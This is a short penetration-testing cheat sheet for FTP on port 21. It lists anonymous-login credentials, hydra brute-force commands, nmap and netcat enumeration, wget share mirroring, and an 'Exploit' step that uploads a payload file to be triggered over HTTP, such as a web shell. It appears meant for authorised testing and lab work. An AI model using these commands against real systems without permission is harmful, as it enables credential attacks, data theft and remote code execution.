TCP: FTP - 21
NOTE: Enter the following for file transfer mode in FTP console
passive
binary
Connection
Anonymous Login
Username
Password
ftp
ftp
anonymous
anonymous
ftp <Username>@<Target IP Address> [Port]
Bruteforce Login
Using Username List and Password List
hydra -L <Username Lists> -P <Password Lists> -f ftp://<Target IP Address> [-p <Port>]
Using Username and Password
hydra -l <Username> -p <Password> -f ftp://<Target IP Address> [-p <Port>]
Using Username:Password list
hydra -C <Username:Password List> -f ftp://<Target IP Address> [-p <Port>]
Enumeration
Nmap
nmap --script "ftp-anon" -p <Port> <Target IP Address>
Banner Grabbing
nc -nv <Target IP Address> <Port>
nc -sV <Target IP Address> <Port>
File Maneuver
Downloading Shares
wget -m ftp://<Username>:<Password>@<Target IP Address>
wget -m --no-passive ftp://:@<Target IP Address>
NOTE: The above command is to download shares if there is no firewall between you and FTP server
Grab Cert
openssl s_client -starttls ftp -connect <Target IP Address>:<Port>
Exploit
NOTE:
Accessing the payload via HTTP would trigger the payload
Recommend .asp or .aspx for Mircosoft servers
put <Payload File>
Last updated